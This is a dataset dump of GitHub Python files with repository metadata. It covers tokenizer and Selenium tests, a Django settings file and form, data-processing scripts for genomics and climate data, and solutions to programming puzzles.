blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
49e700cbe29de94dcbe30c3986931889084d727b | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/nlp/Bert_Chinese_ID3433_for_PyTorch/transformers/tests/xlm/test_tokenization_xlm.py | bd056b69d430916d4db4caa60fd158aa3492ff77 | [
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 3,292 | py | # coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import unittest
from transformers.models.xlm.tokenization_xlm import VOCAB_FILES_NAMES, XLMTokenizer
from transformers.testing_utils import slow
from ..test_tokenization_common import TokenizerTesterMixin
class XLMTokenizationTest(TokenizerTesterMixin, unittest.TestCase):
tokenizer_class = XLMTokenizer
test_rust_tokenizer = False
def setUp(self):
super().setUp()
# Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt
vocab = [
"l",
"o",
"w",
"e",
"r",
"s",
"t",
"i",
"d",
"n",
"w</w>",
"r</w>",
"t</w>",
"lo",
"low",
"er</w>",
"low</w>",
"lowest</w>",
"newer</w>",
"wider</w>",
"<unk>",
]
vocab_tokens = dict(zip(vocab, range(len(vocab))))
merges = ["l o 123", "lo w 1456", "e r</w> 1789", ""]
self.vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["vocab_file"])
self.merges_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["merges_file"])
with open(self.vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.merges_file, "w") as fp:
fp.write("\n".join(merges))
def get_input_output_texts(self, tokenizer):
input_text = "lower newer"
output_text = "lower newer"
return input_text, output_text
def test_full_tokenizer(self):
"""Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt"""
tokenizer = XLMTokenizer(self.vocab_file, self.merges_file)
text = "lower"
bpe_tokens = ["low", "er</w>"]
tokens = tokenizer.tokenize(text)
self.assertListEqual(tokens, bpe_tokens)
input_tokens = tokens + ["<unk>"]
input_bpe_tokens = [14, 15, 20]
self.assertListEqual(tokenizer.convert_tokens_to_ids(input_tokens), input_bpe_tokens)
@slow
def test_sequence_builders(self):
tokenizer = XLMTokenizer.from_pretrained("xlm-mlm-en-2048")
text = tokenizer.encode("sequence builders", add_special_tokens=False)
text_2 = tokenizer.encode("multi-sequence build", add_special_tokens=False)
encoded_sentence = tokenizer.build_inputs_with_special_tokens(text)
encoded_pair = tokenizer.build_inputs_with_special_tokens(text, text_2)
assert encoded_sentence == [0] + text + [1]
assert encoded_pair == [0] + text + [1] + text_2 + [1]
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
50e593e5345382e1c4b44ea0718549de7998cc89 | d3eec7a516ffca4620206f23d399fa085660fb3c | /demo/settings.py | 48a2c62a6757f3a8fb08ef27522fb303d0295091 | [] | no_license | anykate/extend_user_demo | 90c5bff2e973d22d0976e495d2ca4e686be86cf1 | bffce102cefffad30975032c378ce3efbbfb0b5d | refs/heads/master | 2020-11-28T09:52:20.453293 | 2019-12-23T15:21:19 | 2019-12-23T15:21:19 | 229,775,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,139 | py | """
Django settings for demo project.
Generated by 'django-admin startproject' using Django 3.0.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^wya3o)mghoj7fa$@c(3ra*y7n%ie+6#r0vu2db87h13ce)noi'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# My Apps
'myapps.app.apps.AppConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| [
"aryamane.aniket@gmail.com"
] | aryamane.aniket@gmail.com |
13f3dd0325d622f22a952ada5c8b888c11b78111 | d9a4cecfdcccdb60f55b5e3a5670d178f4cf2211 | /copyjunctions_simple.py | d6190e6d10a0be188019de1fac8a00b6d9bfe112 | [
"Apache-2.0"
] | permissive | geng-lee/BAM-to-Junction-BED | e75426f919bbe1781abe8dc6be2de3f83157585b | a878710ee395b2bf7f2eb7e4df84f8383d39d662 | refs/heads/master | 2023-03-17T01:08:20.040686 | 2017-02-28T20:39:23 | 2017-02-28T20:39:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,594 | py | ### hierarchical_clustering.py
#Copyright 2005-2012 J. David Gladstone Institutes, San Francisco California
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#################
### Imports an tab-delimited expression matrix and produces and hierarchically clustered heatmap
#################
# bugs, import matplotlib.colors as mc, -row_method
# new features fastcluster
import export
import string
import time
import sys, os
import shutil
import unique
import getopt
################# General data import methods #################
def filepath(filename):
fn = unique.filepath(filename)
return fn
def cleanUpLine(line):
data = string.replace(line,'\n','')
data = string.replace(data,'\c','')
data = string.replace(data,'\r','')
data = string.replace(data,'"','')
return data
def getFolders(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if '.' not in entry: dir_list2.append(entry)
return dir_list2
def getFiles(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if '.' in entry: dir_list2.append(entry)
return dir_list2
def copyJunctionFiles(directory):
root_dir = getFolders(directory)
#print root_dir
for top_level in root_dir: ### e.g.,
try:
files = getFiles(directory+'/'+top_level)
for file in files:
if 'junctions.bed' in file and 'junctionBEDfiles' not in top_level:
source_file = directory+'/'+top_level+'/'+file
source_file = filepath(source_file)
destination_file = directory+'/'+'junctionBEDfiles/'+top_level+'__junctions.bed'
destination_file = filepath(destination_file)
export.copyFile(source_file,destination_file)
print 'copying to:',destination_file
except Exception:
print 'failed to copy', source_file
if __name__ == '__main__':
if len(sys.argv[1:])<=1: ### Indicates that there are insufficient number of command-line arguments
print "Warning! Please designate a BAM file as input in the command-line"
print "Example: python BAMtoJunctionBED.py --i /Users/me/sample1.bam --g /Users/me/human.gtf"
sys.exit()
else:
options, remainder = getopt.getopt(sys.argv[1:],'', ['i=','g=','r='])
for opt, arg in options:
if opt == '--i': directory=arg
try: os.mkdir(directory+'/junctionBEDfiles')
except Exception: pass
copyJunctionFiles(directory)
| [
"nsalomonis@gmail.com"
] | nsalomonis@gmail.com |
fca91a107b5e307a442b5bceeab6a80e12a5c2d9 | 6df76f8a6fcdf444c3863e3788a2f4b2c539c22c | /django code/p25/enroll/forms.py | 81abe59143f26d866e689893095a339e98c74dbb | [] | no_license | basantbhandari/DjangoProjectsAsDocs | 068e4a704fade4a97e6c40353edb0a4299bd9678 | 594dbb560391eaf94bb6db6dc07702d127010b88 | refs/heads/master | 2022-12-18T22:33:23.902228 | 2020-09-22T13:11:01 | 2020-09-22T13:11:01 | 297,651,728 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from django import forms
class StudentRegistration(forms.Form):
name = forms.CharField()
email = forms.EmailField()
first_name = forms.CharField()
| [
"36443209+basantbhandari@users.noreply.github.com"
] | 36443209+basantbhandari@users.noreply.github.com |
de9c252d46aa0d2b94e2e420716e08d4b131d555 | fc195da9608a52dc298f2fea74d38260425ba829 | /examples/translations/japanese_test_1.py | c45ba7a97b67466613e62ddb3d4f77b38e8dd496 | [
"MIT"
] | permissive | kawarada-san/SeleniumBase | 9f824992911d0eade63df6ab877ae9fd9d6f5b5e | 8e601717fdef0814aae01c6411ea0e1fb114a269 | refs/heads/master | 2021-04-08T21:26:08.663911 | 2020-03-20T04:37:28 | 2020-03-20T04:37:28 | 248,811,137 | 0 | 0 | MIT | 2020-03-20T17:11:45 | 2020-03-20T17:11:45 | null | UTF-8 | Python | false | false | 845 | py | # Japanese Language Test - Python 3 Only!
from seleniumbase.translate.japanese import セレンテストケース # noqa
class テストクラス(セレンテストケース): # noqa
def test_例1(self):
self.URLを開く("https://ja.wikipedia.org/wiki/")
self.テキストを確認する("ウィキペディア")
self.要素を確認する('[title="メインページに移動する"]')
self.テキストを更新("#searchInput", "アニメ")
self.クリックして("#searchButton")
self.テキストを確認する("アニメ", "#firstHeading")
self.テキストを更新("#searchInput", "寿司")
self.クリックして("#searchButton")
self.テキストを確認する("寿司", "#firstHeading")
self.要素を確認する('img[alt="握り寿司"]')
| [
"mdmintz@gmail.com"
] | mdmintz@gmail.com |
19ae610a39764ccc48ee3fdcc09812438be053ca | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/concat82/612-tideGauge.py | 1815baf705abdb18d06e84f33cb97d92e2e83887 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,482 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 13 10:02:00 2020
---------------------------------------------------------
This script concatenates yearly predictor files
Browses the predictor folders for the chosen TG
Concatenates the yearly csvs for the chosen predictor
Saves the concatenated csv in a separate directory
---------------------------------------------------------
@author: Michael Tadesse
"""
#%% import packages
import os
import pandas as pd
#%% define directories
home = '/lustre/fs0/home/mtadesse/erafive_localized'
out_path = '/lustre/fs0/home/mtadesse/eraFiveConcat'
#cd to the home dir to get TG information
os.chdir(home)
tg_list = os.listdir()
x = 612
y = 613
#looping through TGs
for t in range(x, y):
tg = tg_list[t]
print(tg)
#concatenate folder paths
os.chdir(os.path.join(home, tg))
#defining the folders for predictors
#choose only u, v, and slp
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp'),\
"wnd_u": os.path.join(where, 'wnd_u'),\
'wnd_v' : os.path.join(where, 'wnd_v')}
#%%looping through predictors
for pred in csv_path.keys():
os.chdir(os.path.join(home, tg))
# print(tg, ' ', pred, '\n')
#cd to the chosen predictor
os.chdir(pred)
#%%looping through the yearly csv files
count = 1
for yr in os.listdir():
print(pred, ' ', yr)
if count == 1:
dat = pd.read_csv(yr)
# print('original size is: {}'.format(dat.shape))
else:
#remove the header of the subsequent csvs before merging
# dat_yr = pd.read_csv(yr, header=None).iloc[1:,:]
dat_yr = pd.read_csv(yr)
dat_yr.shape
dat = pd.concat([dat, dat_yr], axis = 0)
# print('concatenated size is: {}'.format(dat.shape))
count+=1
print(dat.shape)
#saving concatenated predictor
#cd to the saving location
os.chdir(out_path)
#create/cd to the tg folder
try:
os.makedirs(tg)
os.chdir(tg) #cd to it after creating it
except FileExistsError:
#directory already exists
os.chdir(tg)
#save as csv
pred_name = '.'.join([pred, 'csv'])
dat.to_csv(pred_name)
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
f2ec83131298fd44f3966e637b944e3667885a12 | 3940b4a507789e1fbbaffeb200149aee215f655a | /lc/review_629.KInversePairsArray.py | 8a4cbd070efefb7b9865f42b2eb8fafcf752eaa7 | [] | no_license | akimi-yano/algorithm-practice | 15f52022ec79542d218c6f901a54396a62080445 | 1abc28919abb55b93d3879860ac9c1297d493d09 | refs/heads/master | 2023-06-11T13:17:56.971791 | 2023-06-10T05:17:56 | 2023-06-10T05:17:56 | 239,395,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | # 629. K Inverse Pairs Array
# Hard
# 1131
# 136
# Add to List
# Share
# For an integer array nums, an inverse pair is a pair of integers [i, j] where 0 <= i < j < nums.length and nums[i] > nums[j].
# Given two integers n and k, return the number of different arrays consist of numbers from 1 to n such that there are exactly k inverse pairs. Since the answer can be huge, return it modulo 109 + 7.
# Example 1:
# Input: n = 3, k = 0
# Output: 1
# Explanation: Only the array [1,2,3] which consists of numbers from 1 to 3 has exactly 0 inverse pairs.
# Example 2:
# Input: n = 3, k = 1
# Output: 2
# Explanation: The array [1,3,2] and [2,1,3] have exactly 1 inverse pair.
# Constraints:
# 1 <= n <= 1000
# 0 <= k <= 1000
# This solution works:
class Solution:
MOD = (10**9) + 7
def kInversePairs(self, n: int, k: int) -> int:
dp = [[0] * (k+1) for _ in range(n+1)]
# if k == 0, there is only 1 option - to place the number
for i in range(n+1):
dp[i][0] = 1
for i in range(1,n+1):
for j in range(1,k+1):
'''
instead of this:
for m in range(min(i-1, j)+1):
dp[i][j] += dp[i-1][j-m]
use the below:
dp[i][j] = dp[i][j-1] + dp[i-1][j] - (dp[i-1][j-i] if j>=i else 0)
get this by looking at what is happening in each loop and cross out the ones we do not need and get this formula
'''
dp[i][j] = dp[i][j-1] + dp[i-1][j] - (dp[i-1][j-i] if j>=i else 0)
return dp[-1][-1] % Solution.MOD | [
"akimi.mimi.yano@gmail.com"
] | akimi.mimi.yano@gmail.com |
954aed68a50f07d377742c0dd09e93768493af8f | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_018/ch118_2020_03_31_17_12_49_349131.py | 5b8e656f9a0736224a9852ea334e20ccbbe25997 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | import math
def reflexao_total_interna(n1,n2,teta2graus):
teta2rad = math.radians(teta2graus)
teta1rad = (n2*math.sin(teta2rad))/n1
if math.sin(teta1rad) > 1:
return True
else:
return False | [
"you@example.com"
] | you@example.com |
566f6d1dd1cf89383dcf07c36cdd66d48a63be8f | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/artificial/transf_RelativeDifference/trend_PolyTrend/cycle_30/ar_12/test_artificial_32_RelativeDifference_PolyTrend_30_12_20.py | 3d4e035ecfec1b335fef8fbde0e7c83cbacb5489 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 279 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "PolyTrend", cycle_length = 30, transform = "RelativeDifference", sigma = 0.0, exog_count = 20, ar_order = 12); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
deb2f2b6d8483b552b2f4314ce7f5ba958462d3a | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_171642.81+412622.3/sdB_SDSSJ_171642.81+412622.3_coadd.py | 269e76e3327b7a8949217536052e70c5b6397b16 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[259.178375,41.439528], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_SDSSJ_171642.81+412622.3/sdB_SDSSJ_171642.81+412622.3_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_SDSSJ_171642.81+412622.3/sdB_SDSSJ_171642.81+412622.3_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
8971f4fa9b187ce6b2424fd1736169682efe90b2 | 26f6313772161851b3b28b32a4f8d255499b3974 | /Python/1012_NumbersWithRepeatedDigits.py | 4f0a1b3cd50e2f10a2e76bc5453f8c25bb8a6125 | [] | no_license | here0009/LeetCode | 693e634a3096d929e5c842c5c5b989fa388e0fcd | f96a2273c6831a8035e1adacfa452f73c599ae16 | refs/heads/master | 2023-06-30T19:07:23.645941 | 2021-07-31T03:38:51 | 2021-07-31T03:38:51 | 266,287,834 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | """
Given a positive integer N, return the number of positive integers less than or equal to N that have at least 1 repeated digit.
Example 1:
Input: 20
Output: 1
Explanation: The only positive number (<= 20) with at least 1 repeated digit is 11.
Example 2:
Input: 100
Output: 10
Explanation: The positive numbers (<= 100) with atleast 1 repeated digit are 11, 22, 33, 44, 55, 66, 77, 88, 99, and 100.
Example 3:
Input: 1000
Output: 262
Note:
1 <= N <= 10^9
"""
class Solution:
def numDupDigitsAtMostN(self, N: int) -> int:
"""
transform N to N+1 and count non-repeated nums that smaller than N+1
N+1 got K digits
find all non-repeated nums that less than K digit
and non-repeated nums that all K digit but smaller than N+1
"""
def perm(m, n):
"""
chose n elements out of m elements
"""
res = 1
for i in range(n):
res *= (m -i)
return res
nums = list(map(int, str(N+1)))
res = 0
K = len(nums)
for k in range(1, K):
res += 9*perm(9, k-1) # first digit can not be zero
seen = set()
for i, v in enumerate(nums):
for j in range(1 if i == 0 else 0 , v): #1st digti can not be 0
if j not in seen:
res += perm(9-i, K-i-1) #there are i elments before, and K-i-1 elements after
if v in seen: #there are repeated digits in N, so there are no more nums smaller than N that got non-repeated elements
break
seen.add(v)
return N-res
S = Solution()
print(S.numDupDigitsAtMostN(20))
print(S.numDupDigitsAtMostN(100))
print(S.numDupDigitsAtMostN(1000)) | [
"here0009@163.com"
] | here0009@163.com |
2d7c27442952fe478807ed74d7c022de2f10b28c | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_208/111.py | fb1d05f6613af1be13458ff9e2ba26f08ea8805e | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,654 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 22 11:51:27 2017
@author: pellowes
"""
import numpy as np
import sys
fileIn = '/Users/pellowes/test.in'
fileIn = '/Users/pellowes/Downloads/C-small-attempt1.in'
#fileIn = '/Users/pellowes/Downloads/A-large(3).in'
fileOut = fileIn.split('.')[0]+'.out'
f = open(fileIn,'r')
fo = open(fileOut,'w')
class Town:
def __init__(self,num,distances,horseDistance,horseSpeed):
self.num = num
self.timesTo = {}
self.horseDistance = horseDistance
self.horseSpeed = horseSpeed
self.distances = distances
def solveSimple(n,q,horses,grid,stops):
distanceToNext = []
distanceToEndAgg = []
horseDistances = []
horseSpeeds = []
for horse in horses:
horseDistances.append(int(horse[0]))
horseSpeeds.append(int(horse[1]))
for i in range(0,len(grid)-1):
distLine = grid[i]
distanceToNext.append(int(distLine[i+1]))
distanceToEndAgg.append(-1)
agg = 0
for j in range(len(distanceToNext)-1,-1,-1):
agg+= distanceToNext[j]
distanceToEndAgg[j] = agg
distanceToEndAgg.append(0)
#print(horses)
#print(horseDistances)
#print(horseSpeeds)
#print(grid)
#print(distanceToEndAgg)
#print('-----')
bestTimeFrom = []
for i in range(0,n):
bestTimeFrom.append(1e99)
bestTimeFrom[-1]=0
for i in range(n-1,-1,-1):
#look at all upstream, and try to update them
for j in range(0,i):
if(horseDistances[j] >= (distanceToEndAgg[j]-distanceToEndAgg[i])):
timeBetween = (distanceToEndAgg[j]-distanceToEndAgg[i])/horseSpeeds[j]
if(bestTimeFrom[j] > bestTimeFrom[i] + timeBetween):
bestTimeFrom[j] = bestTimeFrom[i] + timeBetween
if(bestTimeFrom[0] > 1e98):
print(horses)
print(horseDistances)
print(horseSpeeds)
print(grid)
print(distanceToEndAgg)
return str(bestTimeFrom[0])
numcases = int(f.readline())
for casenum in range(1,numcases+1):
problem = f.readline().strip().split(' ')
n = int(problem[0])
q = int(problem[1])
horses = []
grid = []
stops = []
for row in range(0,n):
horses.append(f.readline().strip().split(' '))
for row in range(0,n):
grid.append(f.readline().strip().split(' '))
for row in range(0,q):
stops.append(f.readline().strip())
#print('---')
fo.write('Case #' + repr(casenum) + ': ' + solveSimple(n,q,horses,grid,stops)+'\n')
f.close()
fo.close() | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
9da04c099883870e8ad931318365f288003451d8 | 9ed4d46aedd4d4acadb48d610e940594b5b7b3fd | /project_euler/problem_046/sol1.py | 07dd9bbf84c8046f193eae040861fc196b7ae147 | [
"MIT",
"CC-BY-NC-4.0",
"CC-BY-NC-SA-4.0"
] | permissive | TheAlgorithms/Python | 7596a0e236ed12a61f9db19a7ea68309779cc85b | 421ace81edb0d9af3a173f4ca7e66cc900078c1d | refs/heads/master | 2023-09-01T17:32:20.190949 | 2023-08-29T13:18:10 | 2023-08-29T13:18:10 | 63,476,337 | 184,217 | 48,615 | MIT | 2023-09-14T02:05:29 | 2016-07-16T09:44:01 | Python | UTF-8 | Python | false | false | 2,808 | py | """
Problem 46: https://projecteuler.net/problem=46
It was proposed by Christian Goldbach that every odd composite number can be
written as the sum of a prime and twice a square.
9 = 7 + 2 × 12
15 = 7 + 2 × 22
21 = 3 + 2 × 32
25 = 7 + 2 × 32
27 = 19 + 2 × 22
33 = 31 + 2 × 12
It turns out that the conjecture was false.
What is the smallest odd composite that cannot be written as the sum of a
prime and twice a square?
"""
from __future__ import annotations
import math
def is_prime(number: int) -> bool:
"""Checks to see if a number is a prime in O(sqrt(n)).
A number is prime if it has exactly two factors: 1 and itself.
>>> is_prime(0)
False
>>> is_prime(1)
False
>>> is_prime(2)
True
>>> is_prime(3)
True
>>> is_prime(27)
False
>>> is_prime(87)
False
>>> is_prime(563)
True
>>> is_prime(2999)
True
>>> is_prime(67483)
False
"""
if 1 < number < 4:
# 2 and 3 are primes
return True
elif number < 2 or number % 2 == 0 or number % 3 == 0:
# Negatives, 0, 1, all even numbers, all multiples of 3 are not primes
return False
# All primes number are in format of 6k +/- 1
for i in range(5, int(math.sqrt(number) + 1), 6):
if number % i == 0 or number % (i + 2) == 0:
return False
return True
odd_composites = [num for num in range(3, 100001, 2) if not is_prime(num)]
def compute_nums(n: int) -> list[int]:
"""
Returns a list of first n odd composite numbers which do
not follow the conjecture.
>>> compute_nums(1)
[5777]
>>> compute_nums(2)
[5777, 5993]
>>> compute_nums(0)
Traceback (most recent call last):
...
ValueError: n must be >= 0
>>> compute_nums("a")
Traceback (most recent call last):
...
ValueError: n must be an integer
>>> compute_nums(1.1)
Traceback (most recent call last):
...
ValueError: n must be an integer
"""
if not isinstance(n, int):
raise ValueError("n must be an integer")
if n <= 0:
raise ValueError("n must be >= 0")
list_nums = []
for num in range(len(odd_composites)):
i = 0
while 2 * i * i <= odd_composites[num]:
rem = odd_composites[num] - 2 * i * i
if is_prime(rem):
break
i += 1
else:
list_nums.append(odd_composites[num])
if len(list_nums) == n:
return list_nums
return []
def solution() -> int:
"""Return the solution to the problem"""
return compute_nums(1)[0]
if __name__ == "__main__":
print(f"{solution() = }")
| [
"noreply@github.com"
] | TheAlgorithms.noreply@github.com |
c95316ed88c4eb8b6507da52be9580434e57786d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_divination.py | 6d43fd05084eaeeb1cd6871ad852cdf779c77057 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py |
#calss header
class _DIVINATION():
def __init__(self,):
self.name = "DIVINATION"
self.definitions = [u'the skill or act of saying or discovering what will happen in the future']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
